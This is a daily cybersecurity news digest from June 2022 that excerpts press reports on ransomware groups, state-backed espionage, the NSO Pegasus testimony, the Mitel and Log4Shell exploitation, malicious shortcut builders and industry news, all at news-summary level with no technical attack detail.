Friday, June 24, 2022 // (IG): BB //Weekly Sponsor: UNDERWORLD BJJ
'Universal processor' company Tachyum joins European HPC think tank
FROM THE MEDIA: Tachyum, the outfit aiming to develop a "universal processor" for HPC and artificial intelligence workloads, has joined the European Technology Platform for High Performance Computing (ETP4HPC), a think-tank promoting European HPC research and innovation.
The Slovakian company put out an FPGA prototype last year, which we noted at the time is still a long way away from proving the company's bold claims.
The "Prodigy" chipmaker said it had been accepted as an associated SME member of ETP4HPC, an industry-led non-profit association set up to drive the economic and societal benefits of HPC for European science and industry. The organization counts Intel, HPE, Dell, Atos and Arm among its many members.
READ THE STORY: The Register
NSO claims 'more than 5' EU states use Pegasus spyware
FROM THE MEDIA: NSO Group told European lawmakers this week that "under 50" customers use its notorious Pegasus spyware, though these customers include "more than five" European Union member states.
The surveillance-ware maker's General Counsel Chaim Gelfand refused to answer specific questions about the company's customers during a European Parliament committee meeting on Thursday.
Instead, he frequently repeated the company line that NSO exclusively sells its spyware to government agencies — not private companies or individuals — and only "for the purpose of preventing and investigating terrorism and other serious crimes."
READ THE STORY: The Register
Chinese Threat Actor Uses Ransomware As a ‘Smokescreen’ For Espionage
FROM THE MEDIA: A Chinese-based threat actor has been launching ransomware attacks against organizations in the U.S. and other countries, but evidence suggests that the ransomware is being used by the actor as a “smokescreen” to disguise the true espionage motives behind its campaigns.
The Bronze Starlight actor (also called DEV-0401 by Microsoft), active since early 2021, has been known to leverage a previously disclosed, custom DLL loader called HUI Loader in order to deploy Cobalt Strike and PlugX payloads for command and control as part of its attacks. Over the past year, the threat actor has relied on a lineup of five ransomware families - LockFile, AtomSilo, Rook, Night Sky and Pandora - and posted 21 victims to name-and-shame leak sites as of mid-April.
READ THE STORY: DUO
Avos ransomware threat actor updates its attack arsenal
FROM THE MEDIA: AvosLocker currently supports Windows, Linux and ESXi environments and provides automatic highly configurable builds for the AvosLocker malware. In addition, the threat actor provides a control panel for the affiliates, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts. Avos also provides calling services and DDoS attacks, which means they give phone calls to victims to encourage them to pay the ransom or execute DDoS attacks during the negotiation to add stress to the situation.
AvosLocker has already targeted critical infrastructures in the US, such as financial services, manufacturing and government facilities, according to the FBI. The Avos team do not allow attacks against post-Soviet Union countries. A user nicknamed “Avos” has been observed trying to recruit penetration testers with experience in Active Directory networks and initial access brokers on a Russian forum.
READ THE STORY: TechRepublic
The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance
FROM THE MEDIA: CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited.
The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.
READ THE STORY: Crowdstrike
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
New 'Quantum' Builder Lets Attackers Easily Create Malicious Windows Shortcuts
FROM THE MEDIA: A new malware tool that enables cybercriminal actors to build malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums. Dubbed Quantum Lnk Builder, the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities to generate .HTA and disk image (.ISO) payloads.
Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500.
READ THE STORY: THN
Why think tanks are such juicy targets for cyberspies
FROM THE MEDIA: A new report from Microsoft puts a spotlight on the cyberfront of the Russian invasion of Ukraine — including cyberespionage against think tanks outside Ukraine which can be valuable targets for intelligence gathering or launchpads for additional campaigns.
In the report released Wednesday, Microsoft said it “has detected Russian network intrusion efforts on 128 targets in 42 countries outside Ukraine.” Roughly half of the attacks targeted government agencies, but 12 percent were non-government organizations (NGOs), primarily think tanks with foreign policy expertise or groups assisting in the humanitarian efforts to assist Ukrainian refugees, according to the company.
READ THE STORY: The Record
Automotive hose maker Nichirin hit by ransomware attack
FROM THE MEDIA: Nichirin-Flex U.S.A, a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack causing the company to take the network offline. The attack occurred on June 14, 2022, and the company reacted as soon as it detected the unauthorized access on its network and moved operations into manual mode. Customers should expect delays in getting their orders since the cyberattack also affected product distribution and orders are being fulfilled manually.
In an official statement [PDF, Japanese] yesterday, Nichirin underlines that system recovery has been prioritized to resume business operations. The company is currently investigating how the unauthorized access happened and is trying to determine "the effects of information leakage."
READ THE STORY: BleepingComputer
Ransomware, IP & data theft top concerns for Indian pharma firms
FROM THE MEDIA: Ransomware attacks and IP and data theft are the top cybersecurity concerns for pharma companies in India as they take the digital leap, a new report showed on Thursday. The pandemic and a rising number of targeted attacks have prompted certain pharma companies to double their cybersecurity investments, according to the report by Deloitte India-Data Security Council of India (DSCI).
"To be able to scale this digital vision and create trust globally, the pharma sector must recognize cybersecurity as a key lever, working towards bolstering security around data, operational technologies (OT), and across the supply chain," said Gaurav Shukla, Partner and Leader, Cyber, Deloitte India. "This ability to utilize cybersecurity as a key enabler for business and digital transformation can help pharma organizations make the transition from a leader to a trusted leader," Shukla added.
READ THE STORY: Gadgetsnow
The Rise, Fall, and Rebirth of the Presumption of Compromise
FROM THE MEDIA: In cybersecurity, we often say that "prevention is ideal, but detection is a must." But why do we say that? Shouldn't both prevention and detection be musts in a layered, defense-in-depth security approach? Well, this saying is rooted in a realistic view of reality, where we, as cyber-defense professionals, have come to accept that it's almost impossible to prevent the bad guys from breaking into connected systems. The choices are either total isolation (which, in some cases, can be circumvented) or risking a breach of the system. This notion of failing prevention has become a linchpin in our modern defense strategy and has become known as a "presumption of compromise." That is, assume that you already have been breached and focus on never-ending detection and eradication of the badness lurking in your systems.
READ THE STORY: Darkreading
Microsoft: Russia Stepping Up Hacking, Cyber Penetration Efforts on 42 Ukraine Allies
FROM THE MEDIA: Four months into its war on Ukraine, Russia is carrying out cyber operations on much more than its neighbor, according to a report released by Microsoft Thursday.
In the report, Microsoft said it detected Russian network intrusion efforts in 128 organizations in 42 countries outside Ukraine, with the majority of its “strategic espionage” focused on governments, think tanks, aid groups and businesses. Russia has most often targeted the U.S. and other NATO countries, including Poland, where military logistics and humanitarian assistance is being coordinated.
READ THE STORY: NextGov
Uh oh, malicious Windows shortcuts are making a return
FROM THE MEDIA: At least two threat actors have recently been observed distributing malicious Windows shortcut files designed to infect victims with malware. Late last week, cybersecurity researchers from Varonis reported seeing the dreaded Emotet threat actor, as well as the lesser-known Golden Chickens group (AKA Venom Spider), distributing .ZIP archives via email, and in those archives, .LNK files. Using Windows shortcut files to deploy malware or ransomware(opens in new tab) on the target endpoint(opens in new tab) is not exactly novel, but these threat actors have given the idea a brand new spin.
In this particular campaign, the threat actors replaced the original shortcut icon with that of a .PDF file, so that the unsuspecting victim, once they receive the email attachment, can’t spot the difference with a basic visual inspection.
READ THE STORY: TechRadar
Iranian cyber-attackers trying, and so far failing, to create panic in Israel
FROM THE MEDIA: Iranian cyber-attackers targeting Israel have focused on trying to create panic; however, they have not activated advanced cyber-attack capabilities, say observers in Israel while cautioning that the hostile actors will continue to search for new vulnerabilities.
This month, Iranian cyber-attackers reportedly activated rocket sirens belonging to municipal authorities in Jerusalem and Eilat, as well as targeting the emails of senior Israeli and American officials and executives.
In November, a series of cyber strikes targeted Iranian gas stations and highway signs across the country, reportedly disabling every gas station in the country, while hijacking displays and screening subversive anti-regime messages.
READ THE STORY: JNS
As China shuts out the world, internet access from abroad gets harder, too
FROM THE MEDIA: Most internet users trying to get past China’s Great Firewall search for a cyber tunnel that will take them outside censorship restrictions to the wider web. But Vincent Brussee is looking for a way in, so he can better glimpse what life is like under the Communist Party.
An analyst with the Mercator Institute for China Studies in Berlin, Brussee frequently scours the Chinese internet for data. His main focus is information that will help him understand China’s burgeoning social credit system. But in the last few years, he’s noticed that his usual sources have become more unreliable and access tougher to gain.
READ THE STORY: Stripes
Exporting Repression: 'Made In' Labels Not as Important as Technology Itself
FROM THE MEDIA: The United States government has imposed restrictions on certain Chinese companies citing threats to U.S. security. In some cases, this means U.S. businesses are prohibited from doing business with those Chinese companies unless they first get a license to do so. In other cases, this means the U.S. government itself is prohibited from purchasing supplies from those companies.
The deputy assistant secretary of defense for cyber policy said when it comes to restrictions on Chinese technology, it's not the "made in China" label alone that warrants such restrictions — it's what the technology is designed to do.
"I think one of the challenges when we talk about these things, there's a sort of temptation to say this is about a 'Made in China' label versus a 'Made in U.S.' label," said Mieke Eoyang, who spoke Tuesday during a discussion in Washington, D.C. which was hosted by the think tank Third Way. "It really is about the difference in technology approaches and what that means for us from a security perspective."
READ THE STORY: Defense
Chinese APT Group Likely Using Ransomware Attacks as Cover for IP Theft
FROM THE MEDIA: A China-based advanced persistent threat (APT) actor, active since early 2021, appears to be using ransomware and double-extortion attacks as camouflage for systematic, government-sponsored cyberespionage and intellectual property theft.
In all of the attacks, the threat actor has used a malware loader called the HUI Loader — associated exclusively with China-backed groups — to load Cobalt Strike Beacon and then deploy ransomware on compromised hosts. Researchers at Secureworks who are tracking the group as “Bronze Starlight” say it’s a tactic they have not observed other threat actors use.
READ THE STORY: DarkReading
ICEFALL advice and reactions
FROM THE MEDIA: CISA yesterday noted Forescout's report of the widespread industrial control system (ICS) vulnerabilities the researchers call, collectively, ICEFALL, and CISA has advised attention to the Forescout report and the mitigation recommendations it contains. CISA also pointed out that five of its recent alerts address issues associated with ICEFALL: ICSA-22-172-02 (JTEKT TOYOPUC), ICSA-22-172-03 (Phoenix Contact Classic Line Controllers), ICSA-22-172-04 (Phoenix Contact ProConOS and MULTIPROG), ICSA-22-172-05 (Phoenix Contact Classic Line Industrial Controllers) and ICSA-22-172-06 (Siemens WinCC OA).
SecurityWeek has a round-up of industry comments on ICEFALL. In general, the experts aren't surprised that vulnerabilities of this kind were found, and they're in agreement that ICEFALL is to be taken seriously, and the available remediations applied.
READ THE STORY: The Cyber Wire
Iranian Spear Phishing Operation Targeting US and Israeli Government Figures, Email Account Takeovers Lead to Impersonation Campaigns
FROM THE MEDIA: State-backed hacking groups from Russia and China have been dominating the news cycle as of late, but Iran is reminding the world that it has its own assembly of advanced persistent threat (APT) groups with an espionage campaign targeting high-level members of the government and military of the United States and Israel. The campaign uses spear phishing to gain access to emails, leveraging the account takeover to join in existing conversations and steer them toward supplying login credentials and intelligence.
The spear phishing campaign was uncovered by security firm Check Point Research (CPR) after being notified of suspicious emails by a prominent client in Israel. The security researchers believe it has been going on since at least December 2021 and has targeted a number of Israeli government and military leaders as well as a former US ambassador to Israel.
READ THE STORY: CPO MAG
Cisco quits Moscow
FROM THE MEDIA: Cisco has decided it's time to leave Russia and Belarus, almost four months after stopping operations in response to Russia's illegal invasion of Ukraine. The networking giant announced it would halt operations in Russia and Belarus "for the foreseeable future" on March 3 this year. A June 23 update suggests Cisco sees no future in either nation.
"We have now made the decision to begin an orderly wind-down of our business in Russia and Belarus," the statement reads. The company also promises to "communicate directly with customers, partners, and vendors to settle our financial matters, including refunding prepaid service and software arrangements, to the extent permissible under applicable laws and regulations."
READ THE STORY: The Register
Items of interest
Lithuania warns of rise in DDoS attacks against government sites
FROM THE MEDIA: The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country.
DDoS is a special type of cyberattack that causes internet servers to be overwhelmed by a large number of requests and garbage traffic, rendering the hosted sites and services inaccessible for legitimate visitors and users.
According to NKSC, due to these cyberattacks, Lithuania's transportation agencies, financial institutions, and other large entities have experienced temporary service disruptions.
READ THE STORY: BleepingComputer
Six street view applications to explore the world (Video)
FROM THE MEDIA: Street view applications and sites are a great resource for research in locations and seeing what places look like on the ground. Whether you’re looking to confirm a geolocation you might have done, looking to identify what things might be in an area or whether you’re just curious to see what other pockets of the world look like – street view tools can be extremely useful.
How to map anything with freely available location data (Video)
FROM THE MEDIA: I have also included a few examples in the video, such as mapping CCTV cameras in Munich, or gas well sites in Australia. Please do look around the wiki that I have linked to, as there are lots of opportunities to collect and map data based on what you are investigating, researching, or interested in.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com